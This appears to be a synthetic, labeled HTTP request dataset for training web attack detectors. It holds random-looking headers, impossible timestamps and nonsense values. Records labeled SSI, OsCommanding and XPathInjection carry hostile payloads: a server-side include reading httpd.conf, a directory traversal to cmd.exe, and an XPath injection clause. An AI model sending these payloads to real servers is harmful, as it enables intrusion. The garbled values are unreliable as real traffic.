Cookie: h0aerltMrptiidi=yNryBrehubsg6;fhsfjn=ntrnnhtrpeRt;Esfl=d;dsktelnetYIX=e1ls0 ;2.Vnc3epsX=Tmeqe
Cookie2: $Version="9"
Date: Tue, 08 Feb 05 24:25:22 UTC
ETag: "wC5C@@3slKE6fF2HXx"
Expect: 100-continue
From: yiJqeaa@9hauhsGph.fr
If-Modified-Since: Sun, 30 Sep 07 21:10:57 GMT
If-Unmodified-Since: Thu, 23 Apr 09 23:12:12 UTC
If-Match: *
If-None-Match: "kCTGlU4XzOcE2cws"
If-Range: "m.sQzXrnIgcLZC@Fhl"
Max-Forwards: 789
MIME-Version: 3.3
Pragma: nl0=dEdtlea
Proxy-Authorization: jyhe b0tkvyos=lioe3l1
Authorization: Basic dEdzbVczOm5Fbk90YW9h
Range: -11893
Referer: http://www.RnyNigep.biz/erwdese3/oaEe/d9in7t/vv6wv/1edn.txt
TE: trailers,trailers
Trailer: Host
User-Agent: Mozilla/3.6 (Windows; U; Win 9x 5.5; a3-ul; rv:8.9.8) Gecko/91684885
UA-CPU: PowerPC
UA-Disp: 8659,744,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 9491x5662
Via: 7.4 www.ayoej.css
Transfer-Encoding: identity
Upgrade: sNh/6.5, ssodh/7.1, jrin/2.9, wHoee/3.7, reoo9/6.9
Warning: 004 www.qaG5rro.jpeg "9mp7el34osnrooE0a" "Sat, 23 Aug 08 06:38:14 CET"
X-Forwarded-For: 34.115.88.196
X-Serial-Number: 04486
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 9630
Start - Id: 39671
class: SSI
GET /qKirqcZSJWW.js?rgtoeed=%3C%21--+++++%23include++virtual%3D%22%2Fetc%2Fhttpd%2Fhttpd.conf%22--%3E&XQmCMJ=9703532&i3LraqfunhhhoL=85050603 HTTP/1.1
Host: 5.61.142.129:30542
Connection: keep-alive
Accept: text/*, audio/x-wav;q=0.3
Accept-Charset: *
Accept-Encoding: *;q=0.2
Accept-Language: *;q=0.4
Cache-Control: no-transform
Client-ip: 4.2.127.169
Cookie: A6-childF_Fndh=(ta5indu;ct5execautoexecFImp3P=ihc;ftpcxotlsihr=486873
Cookie2: $Version="57"
Date: Fri, 22 Oct 04 11:58:54 GMT
ETag: "MnC6RG5yCfdECDak"
Expect: 100-continue
From: l5vtEst@R8caTefna.fr
If-Modified-Since: Wed, 06 Oct 04 07:47:09 UTC
If-Unmodified-Since: Mon, 25 Dec 06 14:55:22 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 7781
MIME-Version: 3.8
Pragma: no-cache
Proxy-Authorization: n0eu ard9hoW=9os6s
Authorization: Basic dGFyYm46a0NsZXRh
Range: -7190
Referer: /iee4i/rirsds/aateeehy/gises/orsqaeri.css
TE: trailers,deflate
Trailer: Upgrade
User-Agent: wbiXW.sdvC http://www.cSdtnr.it
UA-CPU: 68000
UA-Disp: 0266,938,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 8969x195
Via: 2.0 21.233.60.202, FTP/3.7 26.203.213.23
Transfer-Encoding: identity
Upgrade: t0igo/9.1, p2G5i/3.1, nwl5/5.4, hec/0.3, tQr/0.4
Warning: 733 214.19.169.247 "I5ohianit" 
X-Forwarded-For: 166.133.168.205
X-Serial-Number: 919920115
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39671
Start - Id: 43711
class: OsCommanding
GET /scripts/..%5c%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: 176.169.137.198:829
Connection: teeyIo
Accept: audio/basic;q=0.7, text/html;q=0.4
Accept-Charset: x-mac-cyrillic;q=0.6, windows-1257;q=0.7, x-mac-greek, cp-936;q=0.3, x-mac-ce
Accept-Encoding: 
Accept-Language: *;q=0.6
Cache-Control: no-transform
Client-ip: 183.153.88.199
Cookie: do=50804;iweyerclfmdooj=3095
Cookie2: $Version="684"
Date: Fri, 21 Mar 08 11:01:58 UTC
ETag: W/"iBbC@9sWtxRHx5im"
Expect: 100-continue
From: nnlogc@ewfasl3.ch
If-Modified-Since: Thu, 25 Sep 08 14:38:23 CET
If-Unmodified-Since: Tue, 19 Jul 05 09:48:27 UTC
If-Match: *
If-None-Match: *
If-Range: Sat, 16 Feb 08 23:35:21 GMT
Max-Forwards: 064
MIME-Version: 8.9
Pragma: no-cache
Proxy-Authorization: Basic c2VhaW46Ykh0U3A=
Authorization: Digest nonce
Range: 7008-71
Referer: /hSan/Niemrnaj.bin
TE: gzip
User-Agent: al@2EM http://www.e1tqhQ.ch
UA-CPU: 68000
UA-Disp: 210,8217,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 5641x613
Via: 6.5 232.80.54.80, 4.3 www.todEeree.png
Transfer-Encoding: tnhrdi; orzia=njLOxln
Upgrade: HweTi/0.0, tten/3.8, hSbn/1.3, sniu/8.5, tfxay/0.5
Warning: 342 www.haYt.jpeg "eunI" 
X-Forwarded-For: 175.133.115.65
X-Serial-Number: 181822248668347
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 43711
Start - Id: 35539
class: XPathInjection
PUT /aE/r1htntwerO/94ueeelwa/eVvgZ6/oRjX6o1lX.tiff? HTTP/1.0
Content-Length: 503
Content-Language: u5iidhCn,3fndoacb
Content-Encoding: deflate
Content-Location: /idom.jpeg
Content-MD5: dHJkbzd0cnlib3JwbGVpUA==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 20 Nov 04 17:50:51 UTC
Last-Modified: Sat, 07 Feb 09 03:32:52 CET
Host: 166.137.130.178
Connection: keep-alive
Accept: text/html, image/*;q=0.9
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.3
Cache-Control: only-if-cached
Client-ip: 50.148.205.107
Cookie: hb=uektn:tsnn|g;bvfe6onQmWReeU=t12Zz--BL1
Cookie2: $Version="80"
Date: Mon, 03 Sep 07 11:20:40 GMT
ETag: "gXOT@1LT1XonrRqHV.s"
Expect: 100-continue
From: Q6fua@alfpse.net
If-Modified-Since: Wed, 30 Nov 05 14:45:16 UTC
If-Unmodified-Since: Tue, 24 Jan 06 01:48:20 CET
If-Match: "QcyQ.HFsiXa.4k-eRUJ"
If-None-Match: "-M4BiRbKBQUE.AaHz"
If-Range: "cf7B6yU6VxCJpyJ"
Max-Forwards: 716
MIME-Version: 2.5
Pragma: no-cache
Proxy-Authorization: NTLM aHJtZTJlYWVzZXIwb2VybGVlb21yOGFuZU5pcnBpam50aQ==
Authorization: Digest algorithm=MD5-sess
Range: 7-26018,971548-,-1
Referer: http://bmLso.uk/fggndsi6/xtoIinhc/onhe5x/hfsd/vh7h.aspx
TE: trailers,chunked
Trailer: Host
User-Agent: Mozilla/1.9 (Machintosh; U; Mac OS X 3.2; hl-eD; rv:3.6.0) Gecko/15297355
UA-CPU: 68000
UA-Disp: 740,794,8
UA-Pixels: 502x021
Via: wwfubf/2.3 225.79.153.111
Transfer-Encoding: identity
Upgrade: rqh/0.3, h5Re/1.2, 2i9ytr/6.7, dnnc/3.7, eie/9.3
Warning: 559 www.obo9.js "F7ceoat8n5sa5ne" "Wed, 18 Nov 09 09:39:58 UTC"
X-Forwarded-For: 73.71.14.52
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

hLttrpendj59nav=30imnND&DYanh=uetbfezoe4&wesw8oosh0it=8162655&loOHtwOL=rIavK62gOHck&voonEa=deiuxrmdocumentra3&lpv=2592043&ue9udclxozks=replacer-from &h3qsgmye=05972099&otesoCeky=enp;irehlfzTms&ekewoys5eaTe=eER94Xm6ejt&3r=7&ro=3617&8libDq@FbOsABW=Dl&br&gn22lhhcbiaaTte=iabsDnn' or    (i < count(ed70h/child::text())    and j   <   count(nn/child::comment())    and    k <     count(sa28et/child::*)   ) or    'mnsesth'   =   '   vmv'     or

End - Id: 35539
Start - Id: 21115
class: Valid
GET /ondst/bdhterc5rO/jdWYmmDscriptb6/oxb3@yFnf/r7enQrJ-4Dbouz/e_Iev-JXPO/ov87xCJlach1S/1s6oqud8Dl/ravi6orwgkZ/M@l9TY0dTgxo/oooo.shtml?.Ynetcatofr7vP=%3Fnn HTTP/1.1
Host: 32.27.212.191
Connection: rpiuRnec
Accept: application/zip;q=0.5
Accept-Charset: *;q=0.6
Accept-Encoding: identity, compress, gzip;q=0.4, deflate
Accept-Language: *;q=0.8
Cache-Control: no-cache
Client-ip: 229.226.31.164
Cookie: tdm52petcer=yv7;JTtm=tha;eoTwdlia=ub665I_rI;da=01159265
Cookie2: $Version="340"
Date: Tue, 23 Oct 07 04:22:29 GMT
ETag: "bEGyFS.RFNQ4ovS471"
Expect: ti8wt
From: esr8neue@emIt.biz
If-Modified-Since: Thu, 25 Aug 05 21:45:59 CET
If-Unmodified-Since: Thu, 09 Jun 05 20:36:02 GMT
If-Match: *
If-None-Match: "9nufpjS@L-qDu68"
If-Range: "soSsrt2uAutYHlg4"
Max-Forwards: 1
MIME-Version: 2.7
Pragma: SyeIttl=sbne
Proxy-Authorization: moAiit nrlemsL=4tepnceh
Authorization: wlue poihH=xeCi3
Range: 08246-7
Referer: http://9twula.cz/lzay/nsecb/aoreH/eehs.png
TE: trailers
Trailer: Connection
User-Agent: Mozilla/9.4 (Windows; U; Win 9x 7.2; te-en; rv:8.2.8) Gecko/11197725
UA-CPU: PowerPC
UA-Disp: 595,813,32
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 969x1839
Via: tuCn/8.2 218.172.163.253:79
Transfer-Encoding: compress
Upgrade: nwr/6.8, eak/9.5, 9dej/0.9, urA/5.8, ecpeiw/5.4
Warning: 755 www.7ereiwoa.htm:827 "Aexaowm" "Sat, 08 Apr 06 11:48:05 GMT"
X-Forwarded-For: 3.73.105.34
X-Serial-Number: 0274722
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21115
Start - Id: 24452
class: Valid
GET /0dhaving/eYsUGQi01wU5NLkrNh_3/cM/m7ca/el7tdtmihqqtteUa/6r/0njnmerressmw/UAn7lm9noleslhe5op/mQvTPcQWEOk/sdUVy3wHm4ozNFQNR9/nLH.php4?rtora=opt6%3Et&nleRhe=n%2B&cttO=6bt&ra93rscmnejr=7&dmnus7lep=1&aiiTtaof=eLse%3AEaae&TadminOd-DQ=00318 HTTP/1.0
Host: 147.40.50.79
Connection: isotn
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: hhthpeu-t0mmai;q=0.1, di-rrndyil5;q=0.1, rtwhE-daod
Cache-Control: s=ejel
Client-ip: 60.13.48.217
Cookie: PBDbKA=8aaee;RLlVopenpT=eee
Cookie2: $Version="454"
Date: Mon, 07 Mar 05 15:59:25 CET
ETag: "L7.MGOCMhvEcaCCmm_j"
Expect: Efnggl
From: eHOniE@ygarsa.be
If-Modified-Since: Sun, 11 Jan 04 04:45:44 CET
If-Unmodified-Since: Wed, 02 Dec 09 24:34:40 GMT
If-Match: "OlT3BZK8Nwk71UGm"
If-None-Match: "vVDLhggHF-kJ2gVtys"
If-Range: *
Max-Forwards: 534
MIME-Version: 6.0
Pragma: no-cache
Proxy-Authorization: Basic aGVmc2pzaDppeWVwbnM=
Authorization: NTLM OXB3clVsdWVleHJFZTJvc2FhZWwzZWMxZHloczM4bGVzNmhweWVrZg==
Range: -78
Referer: /naoscoe/DasTmo.aspx
TE: deflate;q=0.3,trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/4.0 (Machintosh; U; PPC Mac OS X 9.8; to-e0; rv:0.8.6) Gecko/45576433
UA-CPU: MIPS
UA-Disp: 200,0703,8
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 257x1408
Via: cc4C/5.1 208.20.6.160:89987, 5.1 www.sitftnyh.png, FTP/3.1 47.44.99.226
Transfer-Encoding: zjxe; obtme=gntwd
Upgrade: ahdnfh/7.6, fcyeO/8.8
Warning: 838 www.iuUqaua.png:81783 "jeoeOeEehrcia6tshi" "Mon, 12 Nov 07 12:17:37 GMT"
X-Forwarded-For: 213.50.40.93
X-Serial-Number: 782387
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 24452
Start - Id: 27524
class: Valid
GET /lI.sh? HTTP/1.0
Host: 127.140.113.130
Connection: keep-alive
Accept: */*;q=0.9
Accept-Charset: windows-1255;q=0.2
Accept-Encoding: gzip, deflate, deflate, gzip, deflate
Accept-Language: vssouTe-er, aAeser-4e, EOev-odannhn;q=0.1, tIopjs-rlr9;q=0.7
Cache-Control: max-age=0
Client-ip: 34.117.164.116
Cookie: sdzIzm8uIkusCR=18
Cookie2: $Version="154"
Date: Mon, 27 Dec 04 05:08:50 UTC
ETag: "jnby2ZQMQJ8yv9zGd"
Expect: me45h5b
From: jdne@cltrleiio.gov
If-Modified-Since: Sun, 10 Jan 10 18:46:06 UTC
If-Unmodified-Since: Thu, 18 Dec 08 22:43:04 UTC
If-Match: "QA9QWdP8-ZYqWVoK"
If-None-Match: "57Xcky93z21hgukSqr9"
If-Range: Thu, 23 Feb 06 05:12:50 UTC
Max-Forwards: 4835
MIME-Version: 3.1
Pragma: no-cache
Proxy-Authorization: Digest qop=auth-int
Authorization: Basic bmVyY2x0OnBhSTl3Yw==
Range: 895579-,54531-,8-
Referer: /QuiOrAy/20u4c/rmh1Te/vIce9.mdb
TE: chunked;q=0.0,gzip,chunked
Trailer: Max-Forwards
User-Agent: Mozilla/3.7 (X11; U; Linux i586 9.2; 7m-ih; rv:3.9.9) Gecko/74828575
UA-CPU: PowerPC
UA-Disp: 883,733,32
UA-OS: Linux
UA-Color: color32
UA-Pixels: 0727x861
Via: HTTP/6.4 148.126.225.134
Transfer-Encoding: identity
Upgrade: Npnao/5.5, 7inei/1.4, 1fe/9.6
Warning: 561 www.Nlensr.png "s0qusp6lni" 
X-Forwarded-For: 224.28.160.220
X-Serial-Number: 427762626542035
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 27524
Start - Id: 11999
class: Valid
GET /7j/ctMo66i0relq/aXzIertcp/lQidZXWqO/HCR-qwGi/hanip6edteoeydtee/xpasswd.mspx?dyatr9oojdnsn5i=tnperlyaBqT&EinSJPcRiotbx=Ert-i&uEomrR=26523214&He3nueet=link%2BlxN HTTP/1.0
Host: www.rle9sudda.fr:16
Connection: oe5d
Accept: */*;q=0.4
Accept-Charset: *
Accept-Encoding: compress;q=0.4, identity, identity;q=0.8, gzip, deflate;q=0.2
Accept-Language: *;q=0.6
Cache-Control: B7=2
Client-ip: 71.109.118.53
Cookie: ee5=>4rzd a4iselectp ;nhrd=>ox@oj2aeCleS;tae;_dm0l2i9HbinD=e.57V9dOD9
Cookie2: $Version="28"
Date: Sat, 19 Jul 08 07:35:32 UTC
ETag: "azk_rN20wtoPDiQA8P"
Expect: 100-continue
From: heeltin@ed0ee3i7c.fr
If-Modified-Since: Mon, 16 Mar 09 06:51:32 CET
If-Unmodified-Since: Sun, 03 Oct 04 17:55:02 CET
If-Match: "fx9Q8d6@61AnTJoiPlfz"
If-None-Match: "CUGF-BuxJDHJGYh5f"
If-Range: Sun, 26 Mar 06 07:22:34 CET
Max-Forwards: 512
MIME-Version: 7.7
Pragma: evEhnc7=ul
Proxy-Authorization: Basic bnRlaTpFcjBiY2k=
Authorization: odtnto Tbthacl=bwwkN
Range: 9-,78403-
Referer: /etssT/ixee/hp4Fk/Gpiw.dll
TE: chunked;q=0.4
Trailer: Accept
User-Agent: Mozilla/2.1 (X11; U; Linux i586 6.1; 5v-ij; rv:0.1.5) Gecko/75959322
UA-CPU: Sparc
UA-Disp: 216,5024,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 630x5808
Via: 6.8 22.227.106.162, 4.7 www.6o7it.jpg:5416, FTP/7.3 www.hiyDlef.htm
Transfer-Encoding: compress
Upgrade: r9sP/4.2, ek3c/8.3, hde/4.8, hcnli/4.1, mt9/7.2
Warning: 262 www.itetharh.css "tdqd4ieaDLErnog" 
X-Forwarded-For: 239.127.131.42
X-Serial-Number: 670096035438562
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 11999
Start - Id: 1409
class: Valid
GET /yechoatmplu/n8JhIHDO_OZh-VuqYx/4bq2hd7ns/enelyPttSze/ngEwhereZvYzpasswdPunion2gRd/cvIfRWuKfluyCeTG0P/e.O7@36h-/oXrW/zmhca/@meta4_yAB/enMfC8qK17dXQh8/eeo.gif?6I=78605&i9be3hp7e=2fFcS&02noWfe5h1dure=eM60l&tEcntoam=cwoni&aamh=e%3FEisoc HTTP/1.1
Host: 196.217.74.46
Connection: rethcnhn
Accept: text/xml;q=0.5, video/mpeg, text/plain;q=0.1
Accept-Charset: windows-1254, x-mac-turkish;q=0.3
Accept-Encoding: deflate, deflate;q=0.4, identity;q=0.1, deflate
Accept-Language: *
Cache-Control: tamab='tnhtdn6'
Client-ip: 145.43.119.173
Cookie: n0o=952808954;sj=uLeqmD-ft-ub;5M09h-=1tr-ulN4ott;eonmaheutatdt=yyxbdbc4wx;ntkito=JptD;eRyifeoloeEeiai=thg
Cookie2: $Version="77"
Date: Thu, 10 Aug 06 07:49:35 UTC
ETag: "3YvwRJfRSCNjWREyB9"
Expect: u3tr77
From: pa8eeese@safsis72.st
If-Modified-Since: Sun, 11 Jan 04 07:09:39 UTC
If-Unmodified-Since: Tue, 30 Oct 07 18:12:58 UTC
If-Match: "Wm7z9UcFF4Lxw3tnIwtG"
If-None-Match: *
If-Range: *
Max-Forwards: 7
MIME-Version: 7.3
Pragma: no-cache
Proxy-Authorization: s3a9ty dgws=1v3t
Authorization: etrs i6qeq=cksptoBr
Range: 6-15763,0058-47
Referer: http://www.iereark.biz/sFnxi.jpeg
TE: chunked;q=0.8
Trailer: Proxy-Authorization
User-Agent: Mozilla/9.4 (Machintosh; U; Mac OS X 5.6; lT-du; rv:2.6.2) Gecko/49300344
UA-CPU: x86
UA-Disp: 018,1433,32
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 238x900
Via: 5.2 www.Artueln.jpeg, HTTP/0.8 176.92.116.76:8204, 1.9 29.160.124.136
Transfer-Encoding: identity
Upgrade: etiga/2.7
Warning: 770 www.eTeDmS.jpeg:49 "e1Lit6sroulO1cet3" "Tue, 08 Sep 09 01:51:56 GMT"
X-Forwarded-For: 166.217.103.151
X-Serial-Number: 1347008
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 1409
Start - Id: 24868
class: Valid
GET /lestournyverh/nTjUhYVxpftVFQHR2y/BkMyVxpGexecUud/qR5@Nimxp9.pl?dwndqle3maf=ieee%29u0C%3Cdkedjm&tcdeajieyow5oo=d%7ENxcs&hUeZaraenuuglty=+la-Nn50arsh HTTP/1.0
Host: 126.159.101.224:4
Connection: gheWh
Accept: text/*, video/mpeg
Accept-Charset: x-mac-chinesesimp, iso-2022-jp;q=0.0, iso-8859-8;q=0.0, iso-8859-2
Accept-Encoding: 
Accept-Language: *;q=0.6
Cache-Control: min-fresh=4
Client-ip: 18.46.60.86
Cookie: ow=3oaaktrtnt;Egs31qR=094995
Cookie2: $Version="513"
Date: Fri, 16 Mar 07 09:32:10 GMT
ETag: W/"OooAj4YqPW1G8mIh"
Expect: 100-continue
From: a0qa@iyrhn.st
If-Modified-Since: Fri, 31 Oct 08 23:47:56 GMT
If-Unmodified-Since: Tue, 15 May 07 17:08:31 CET
If-Match: "ffFiNdOniQp15@7_"
If-None-Match: *
If-Range: Mon, 06 Aug 07 02:20:39 GMT
Max-Forwards: 59
MIME-Version: 7.8
Pragma: e=wdeb
Proxy-Authorization: Vigo a1lc=hriaibi
Authorization: o0Yl whil=CaaoW2u
Range: 61-479552,-496,9953-
Referer: /deqT/Gkhtc3t/uonrHsir.gz
TE: trailers
Trailer: Accept-Encoding
User-Agent: Mozilla/2.7 (compatible; Rs9s; Windows NT; teiiivaton; stfnT)
UA-CPU: MIPS
UA-Disp: 5769,5085,16
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 265x4380
Via: oletU/1.5 www.eotrs.html
Transfer-Encoding: compress
Upgrade: htg0Oe/2.3, CC7t1n/7.2, a9jg/6.9
Warning: 569 www.oq8ot.css "draaicTya4hanxeos" 
X-Forwarded-For: 117.106.89.58
X-Serial-Number: 827466512
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 24868
Start - Id: 5026
class: Valid
POST /sgas6dwatdD/iot7h3havEK1/pGIC/niHeHtqCkmuQc9TYq8JM/uuu/sQNqr-WlalaXeQNuym/aGd1QBg-5j4Abt/G5GX2tshutdownaKdhGo8.png? HTTP/1.1
Content-Length: 309
Content-Language: t
Content-Encoding: identity
Content-Location: http://ollw.de/Nwn0o/1utmdeze.exe
Content-MD5: cnk2YTJ0bnhldWxtbWlUNw==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 01 Jul 06 18:10:30 UTC
Last-Modified: Wed, 06 Feb 08 10:31:32 GMT
Host: 94.143.167.176:80
Connection: keep-alive
Accept: image/*;q=0.3
Accept-Charset: cp-932, iso-10646-ucs-2, x-mac-ce, windows-874;q=0.5, x-mac-greek
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-transform
Client-ip: 122.44.235.75
Cookie: biebp=4HcvwWMZe
Cookie2: $Version="949"
Date: Sat, 02 Oct 04 03:20:13 UTC
ETag: "arxd.GetOL1VZFQ8"
Expect: rjidLy=lcseE5h
From: anypee@kdrqiteI.it
If-Modified-Since: Wed, 13 Feb 08 08:11:27 GMT
If-Unmodified-Since: Wed, 27 May 09 13:29:08 GMT
If-Match: "LHbsXgMVxs1MUu_eF"
If-None-Match: "I5kXImh6hhJi6p7EHOnG"
If-Range: Wed, 16 Apr 08 15:04:58 CET
Max-Forwards: 64
MIME-Version: 2.1
Pragma: no-cache
Proxy-Authorization: Basic MmZuTnpyejplTWlTY2NzZQ==
Authorization: Digest realm
Range: -17,22294-37803,139-
Referer: http://www.Lzd4.de/on7g/h0iloeh/ho4p.gif
TE: chunked
Trailer: Accept-Encoding
User-Agent: tler (tRg_8VUkwv; hAenBWSOOh; uL9OPDu; rP.oCq; arQcW0)
UA-CPU: StrongARM
UA-Disp: 1514,212,32
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 8269x495
Via: 5.9 www.eoawin.css, HTTP/2.3 184.209.128.254, FTP/2.9 www.ig2Ppai.css
Transfer-Encoding: gzip
Upgrade: zcci/6.6, nahgit/2.1, zBd/1.0
Warning: 847 www.cs4tji.gif:1579 "ciCj6llogyAnxa" "Fri, 13 Oct 06 21:39:00 GMT"
X-Forwarded-For: 90.219.143.51
X-Serial-Number: 4278747254
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

titcAreahn9NTip=r&mie=420163&swhahI7pcnomt=nXaiEuE2soEtyse&ionsdkahene=281&ae1tzhfoytpshei=9838&sscii=56575&ze8xektgnja=xie9ebirfrdy&uci7ata08tsi= rbodyuoiedpwru |)na%o&FVVxterm=spoa&yRey=2ryrtt6eShsnoT&4edOSh=Npnluroa9oltCzbhes&xdb6xbt=taIayI&omlxjacbnoietx=leeexeceeCt-O:z&hiornu1=n?rdLmopnrz8rcgi

End - Id: 5026
Start - Id: 19746
class: Valid
GET /G9rcpnD6Rxterm/SWf0dN.r2a3/h4eo2Mo/aj4O1o_lugcJhcQ.ys/Sndx/_i9Tht7binX8k/wherezIRe/e3Fc1XuQaiR6BPXnwwy/r.L0ZRU4tvA0c6vh/6km.tiff?ouagopaoteie=2344705817&ciixes=decEknhswst&rstisars7roei1=otdropa HTTP/1.0
Host: 186.18.230.143
Connection: keep-alive
Accept: image/gif, video/*;q=0.0
Accept-Charset: *
Accept-Encoding: 
Accept-Language: ruzana-o, rarna-eab, eib-aT;q=0.5
Cache-Control: no-transform
Client-ip: 73.181.80.121
Cookie: ggusnuNvnssea=uoa8egybeob;44=9ssisstR;vo0mail46HLjI-k=1r3Ess;tnatk0ts0fls=8ksi;oquepl1hcDCm=oinviec6chtacces;eovogtTu=qBRrRQz0D
Cookie2: $Version="1"
Date: Fri, 09 Apr 04 09:46:02 GMT
ETag: W/"K8j.PFB6aCrNVKbruSz"
Expect: 100-continue
From: iuIqi35@sebqclrtn.be
If-Modified-Since: Fri, 15 Apr 05 10:23:54 GMT
If-Unmodified-Since: Thu, 01 Jun 06 23:03:49 CET
If-Match: "YN6yLSERW4XsJVxz"
If-None-Match: "Suaqy0xqHOad1NQrUe"
If-Range: *
Max-Forwards: 91
MIME-Version: 8.6
Pragma: no-cache
Proxy-Authorization: NTLM bHRIaXRocnN1YTZpczlEc2FpZWlhOW5hOXROdmNQb250cmhp
Authorization: eotn 9rdir=deue1nf
Range: 4774-
Referer: http://ea1e.gov/teiiendo/oa6dhu/rerh/j8tqptin.jsp
TE: trailers,trailers,trailers
Trailer: Max-Forwards
User-Agent: eBOFbdeIC http://www.oycPet.biz
UA-CPU: PowerPC
UA-Disp: 108,777,8
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 3293x4610
Via: 8.8 128.49.90.2
Transfer-Encoding: gzip
Upgrade: no0E/0.8, 0wmAl/6.4, eee/7.7, 81t/9.2
Warning: 973 www.w9lj1Tli.html "wnwacLteirt" 
X-Forwarded-For: 43.198.16.171
X-Serial-Number: 465640999525707
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 19746
Start - Id: 19094
class: Valid
GET /0WnZ_deletev.ZXwz3RR/l4FloBLwEHLgt7P/o1ahglsrah03if5a/7JzdJHo.1/yvC0AcMc_@v3K.png?phoeti=ub0Ga&oItaI1potkwikeo=t%2Bi&eleyElgEiean=orNimge&pibwryatisnlv1=04334601&wlearnE8e=191777&4tRS5qeir=0hdat&r77aeNhohg=esDuaYtwget2T&eeomre2=79&OfmlAw5dl3ToSa=ewElo HTTP/1.1
Host: www.ratetit.biz
Connection: keep-alive
Accept: video/quicktime;q=0.3
Accept-Charset: cp-932, iso-8859-2, euc-tw
Accept-Encoding: deflate;q=0.3, gzip;q=0.2, identity, deflate
Accept-Language: *;q=0.4
Cache-Control: no-cache
Client-ip: 75.93.113.251
Cookie: rtns=190575;ns2qs97alotSia=Zant39ptYdlianqY;qy9gir75m=Stebxf;gtn=1033025;fmych=tttlietgiESgnzs;qoHJa=cbRpsh1-rl iObwwinnt91h
Cookie2: $Version="04"
Date: Fri, 28 Dec 07 24:55:14 CET
ETag: W/"ybTiqqPUXJhv01KIDA9"
Expect: 100-continue
From: dvelvane@qhwetaoqup.st
If-Modified-Since: Thu, 30 Jul 09 11:57:05 UTC
If-Unmodified-Since: Wed, 07 Jan 04 12:32:25 CET
If-Match: *
If-None-Match: "rrpjPDvzOdQgst@h"
If-Range: *
Max-Forwards: 1017
MIME-Version: 3.9
Pragma: no-cache
Proxy-Authorization: e8w3T rr26=fpTqfott
Authorization: Digest nonce
Range: 2-,-0,87927-654
Referer: /eshis9o/daor/gmcert/taesp68x.php
TE: trailers,gzip
Trailer: Accept-Charset
User-Agent: adXKgxw.9g http://www.ryuecet.ch
UA-CPU: x86
UA-Disp: 2540,4307,8
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 3478x807
Via: HTTP/8.5 100.198.178.49, 7.8 159.167.7.83:6170
Transfer-Encoding: identity
Upgrade: uh18/7.6, a1w/5.6, ydmr/7.2, o5j/2.9, rmIai/6.0
Warning: 769 www.ynfoTewU.png "tyneuSih9ho" 
X-Forwarded-For: 31.76.137.109
X-Serial-Number: 594077
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 19094
Start - Id: 23188
class: Valid
GET /sF2iZXFG7ZFhBE8oz/oM3__Y29SPciBIq1@p2R/aay.aspx?iframer--0_u_kwTL=iribsotkA3haun&lessro2=%29%274%5D&allobject-9=1610362408&ien3=hE6Y%40xf&ur896dsossN89p=adiwoheiTtnloim&Kw5s=1xees&6iilsiRt=upegdmeia%25ulike&tlieiqeets0dtah=i%3Af&ejt6nm5e=e3e0uiDen HTTP/1.1
Host: www.w7aiainv.de
Connection: close
Accept: audio/*
Accept-Charset: *
Accept-Encoding: deflate, deflate, gzip;q=0.5, identity, gzip
Accept-Language: glwTv-5toeYmme;q=0.3
Cache-Control: only-if-cached
Client-ip: 242.122.96.228
Cookie: esffeliL=603615;gsock_streamstdin3Qnperl_=e8eba;sjhO6vEw=8112506;eObwtcij=28;jogcsaS2e=maiT~ -tstyle3
Cookie2: $Version="98"
Date: Wed, 06 May 09 16:35:50 UTC
ETag: W/"Xq5.Xw_NbR_Zdkg9UqBS"
Expect: 100-continue
From: yEynS@yostnHon.org
If-Modified-Since: Sun, 23 Jan 05 06:12:01 CET
If-Unmodified-Since: Fri, 04 Mar 05 13:58:55 UTC
If-Match: *
If-None-Match: *
If-Range: Sun, 13 May 07 23:45:14 GMT
Max-Forwards: 8
MIME-Version: 3.7
Pragma: aI=eh
Proxy-Authorization: NTLM OTZodXJlQ3RtWDh0ZThheG40ZWFhZ2lyVHBIZXRpdHZiaGVvc2hI
Authorization: NTLM eGY2V3Vob2h3aXJzb0lybm1BdEk1b2kzaGRjcW9lZmduQXowbWltMGkwZWthZXM=
Range: -993347,19-784
Referer: http://ieyeoN.biz/Wona/eEmcali/tdiiis3.php3
TE: trailers,trailers,trailers
Trailer: Date
User-Agent: sEzneaOwg/6.5
UA-CPU: PowerPC
UA-Disp: 1015,816,32
